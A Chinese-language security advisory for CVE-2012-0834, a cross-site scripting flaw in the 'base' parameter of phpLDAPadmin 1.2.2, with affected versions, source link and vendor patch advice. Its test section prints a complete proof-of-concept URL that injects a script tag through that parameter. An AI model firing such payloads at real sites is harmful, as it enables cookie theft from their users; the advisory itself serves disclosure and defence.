phpLDAPadmin “base”参数跨站脚本执行漏洞
phpLDAPadmin “base”参数跨站脚本执行漏洞
发布日期:2012-02-01
更新日期:2012-02-17
受影响系统:
phpLDAPadmin phpLDAPadmin 1.2.2
不受影响系统:
phpLDAPadmin phpLDAPadmin 2.0
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 51793
CVE ID: CVE-2012-0834
phpLDAPadmin是基于web的LDAP客户端,允许方便的管理LDAP服务器。
phpLDAPadmin在实现上存在跨站脚本执行漏洞,攻击者可利用此漏洞在受影响站点中执行任意脚本代码,窃取Cookie凭证。
<*来源:andsarmiento
链接:http://www.securityfocus.com/archive/1/521450
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/phpldapadmin/htdocs/cmd.php?cmd=query_engine&server_id=1&query=none&format=list&showresults=na&base=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&scope=sub&
filter=objectClass%3D* display_attrs=cn%2C+sn%2C+uid%2C+postalAddress%2C+telephoneNumber&orderby=&size_limit=50&search=Search
建议:
--------------------------------------------------------------------------------
厂商补丁:
phpLDAPadmin
------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://phpldapadmin.sourceforge.net/
评论暂时关闭